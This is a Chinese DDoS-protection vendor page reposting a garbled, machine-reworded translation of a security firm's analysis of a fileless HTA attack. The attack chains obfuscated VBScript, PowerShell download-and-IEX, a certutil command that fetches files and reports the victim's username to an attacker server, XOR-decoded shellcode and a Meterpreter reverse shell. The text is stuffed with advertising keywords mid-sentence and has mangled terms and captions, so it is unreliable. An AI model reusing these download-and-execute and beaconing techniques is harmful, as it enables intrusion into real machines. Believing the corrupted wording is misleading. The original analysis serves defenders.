海外高防_防三高_超高谨防-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!

QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > 高防服务器 > 海外高防_防三高_超高谨防

海外高防_防三高_超高谨防

小墨安全管家 2021-05-02 23:33 高防服务器 89 ℃
DDoS防御
作者:Josh Stroschein,Ratnesh Pandey和Alex荷兰。为了要想在不被发觉的事情下成功举行攻击,DDoS防御,攻击者需要限制其恶意软件创建文件和网络构件。在这篇文章中,我们分析了一次攻击,它讲明了两种常用的躲避策略检测:幸免保存经过直截了当在内存中运行恶意代码将工件文件到磁盘。这些攻击被称为"无文件"攻击。[1]使用操作系统内置的合法程序来执行或促进恶意功能,DDoS防御,如代码执行、持久性、横向挪移和指挥和操纵(C2)。对这些程序的滥用被称为"日子在陆地上"。[2]我们的攻击始于一具用户点击一具超链接,该链接将他们带到一具托管恶意HTA(HTML应用程序)文件的网站。HTA文件导致两个时期的shell代码的执行,最后来导致metermeter反向httpshell会话与C2服务器建立。可是,由于Bromium安全平台(BSP)将诸如在微型虚拟机中打开网页等惊险活动隔离开来,所以攻击得以成功遏制。所以,CC防御,攻击者无法在网络。尽管使用HTA文件是一种特别好理解的执行恶意代码的技术,[3]我们以为这种攻击值得探究,因为攻击者采取了一些步骤来减少攻击的阻碍。其中包括直截了当在内存中执行多个时期的外壳代码,应用从目标侦察中获得的信息来伪装攻击者的网络流量,以及使用在陆地上日子的方式二进制文件。它在单击超链接后以HTA文件开头,系统将提示目标保存一具名为sweepstakeApp.hta网站到磁盘。假如使用Internet Explorer访咨询站点,则会提示目标从其web扫瞄器运行或保存文件(图1)。这一点特别重要,因为HTA文件只能使用Microsoft HTML应用程序主机直截了当从Internet Explorer或Windows Explorer打开(mshta.exe),但不能从其他web扫瞄器。决定使用HTA文件作为向量来执行攻击者的代码,这表明对目标主机的配置有一定的了解,例如使用的默认web扫瞄器。HTA文件允许开辟人员使用internetexplorer引擎的功能,包括它对VBScript和JavaScript等足本语言的支持,没有它的用户界面和安全功能。[4]图1-提示在Internet上打开或保存恶意HTA文件探险家下载的HTA文件包含含糊处理的VBScript代码,如图2所示,它使用父进程以及命令行.exe经过实例化WScript.Shell对象,该对象使足本可以与Windows shell的某些部分交互。并且,向用户显示一具弹出窗口,其中包含礼品卡扫描桩的假定结果(图3)。图2–HTA中的含糊VBScript代码文件。图3–弹出向用户。这个第一具命令使用PowerShell从URL下载一具含糊的PowerShell命令WebClient.DownloadString想法,接着使用Invoke-Expression cmdlet的别名在内存中执行它,IEX.图4–PowerShell命令,可在经历。图5–使用下载的含糊命令PowerShell。正在验证感染的第一时期第二个命令启动一具命令行.exe接着运行的进程certutil.exe, Windows中内置的另一具程序,用于治理数字证书。该有用程序也可用于从远程服务器下载文件。例如,经过使用以下命令,攻击者能够下载并保存文件本地:certutil.exe-urlcache-split-f[URL]DestinationFileIn在这种事情下,提供的URL参数是使用目标系统上的%USERDOMAIN%和%USERNAME%环境变量生成的,目标文件名为"null"–Certutil命令,通知对手HTA成功运行文件。导航返回HTTP 404状态代码。所以,该命令不是下载文件,而是经过向攻击者操纵的包含目标主机用户名和域的web服务器发送GET请求来通知攻击者HTA文件已成功执行。攻击者能够简单地监视他们的web服务器日志来确定哪些用户成功地运行了HTA文件.分析PowerShell下载的命令包含压缩的Base64编码字符串。在对字符串举行解码和解压缩后,它显示了另一具PowerShell命令,如图7所示命令。这个图7中的命令包含一具含糊的字符串。首先,从Base64对字符串举行解码,接着将结果转换为字节数组并存储在名为$var_code的变量中。最终,足本进入一具For循环,该循环遍历字节数组,并对每个硬编码值为35(以10为基数)的字节执行按位异或操作_代码。遵循除臭,生成图9中的输出网址。图9–第一时期外壳代码。那个是外壳代码的第一时期,PowerShell使用托付函数VirtualAlloc在内存中执行。函数调用分配flAllocationType为3000的内存(MEM峎RESERVED和MEM_COMMIT),内存爱护权限为PAGE_EXECUTE_读写。首先时期外壳代码分析在scdbg中模拟外壳代码的第一时期能够显示其功能(图10)。调用LoadLibraryA用于将WinINet模块加载到调用进程的进程空间中,在这种事情下父进程.WinINet是标准的Windows API,软件使用它经过HTTP和FTP与Internet上的资源举行通信协议。下一步调用InternetOpenA初始化网络连接。接着调用InternetConnectA,经过TCP端口443打开与远程服务器的HTTPS会话。接着,调用HttpOpenRequestA来创建一具HTTP请求来从服务器检索对象(/pwn32.gif?pwnd=真)。由于lpszVerb参数为null,所以请求将使用GET想法。接着使用InternetSetOptionA配置多个选项。最终,在对HttpSendRequestA的调用中发送请求。我们能够看到定义了一具自定义用户代理字符串和一具cookie值:Cookie:会话用户代理:Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.0)类似Geckoth用户代理字符串对应于Windows 10上的Internet Explorer 11。值得注意的是,用户代理字符串与目标主机上使用的Internet Explorer版本相匹配,这是攻击者了解目标网络的另一具指标。经过摹仿用户代理字符串,恶意软件生成的网络流量更有大概与目标组织的合法流量混合交通。图10–模拟的第一时期外壳代码scdbg.反编译外壳代码证实了scdbg的发觉。外壳代码从典型的位置无关代码(PIC)行为开始,调用函数sub_88,该函数的第一条指令是将堆栈顶部加载到EBP寄存器中。这使得代码可以计算出基址,因为CALL指令将下一条指令的地址放在堆栈上(图11)–调用sub_88。图12–将堆栈顶部的值弹出到退潮了恶意软件作者使用堆栈字符串在堆栈上生成字符串,虽然在外壳代码中也许特别少使用它们。这是在外壳代码中创建和使用字符串的一种简单想法,并且使用标准字符串寻找有用程序也使外壳代码的功能更难发觉。图12显示了堆栈字符串的用法,该字符串用作WindowsAPI函数的参数呼叫。解决函数也是shell代码的重要的第一步。由于外壳代码不需要像一般的可执行文件那么举行加载,于是它必须独立地解析函数地址。这通常是经过在进程中使用未记录的结构并手动遍历已加载库的导出表来完成的。此外,很多shell代码作者将幸免使用字符串来寻找所需的函数。相反,它们将使用预先计算的哈希值。接着,他们的代码将计算所需函数库的哈希值并比较哈希值。这不仅是一种计算成本低廉的函数寻找想法,而且由于分析员必须将散列与其所表示的函数相关联,所以分析也变得复杂。图12演示了这种技术的使用,在调用EBP之前,将一具看似随机的4字节值推送到堆栈上。EBP将包含负责寻找所需函数指针并最后来执行这些指针的函数的地址功能。图13–堆叠弦。这个对EBP的调用是原始调用指令之后的地址。此代码首先经过FS:30h猎取指向process environment block或PEB结构的指针。此结构允许代码获得进程空间中加载的所有库的双链接列表。遍历此结构允许代码寻找任何库的基地址,接着遍历导出表以寻找函数指针。所以,此函数负责使用预先计算的哈希来寻找整个代码中调用的所有函数,并将重复使用从头到尾。假如不熟悉shell代码怎么使用PEB结构和解析可移植可执行文件(PE)格式来寻找函数指针,DDoS防御,花点时刻分析那个函数是值得的。然而,在本分析中,没有必要迷失在那个函数中。相反,非标准函数返回的证据能够关心确定函数何时完成并允许分析

海外高防_防三高_超高谨防


DDoS防御

当前位置:主页 > 高防服务器 > 海外高防_防三高_超高谨防

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119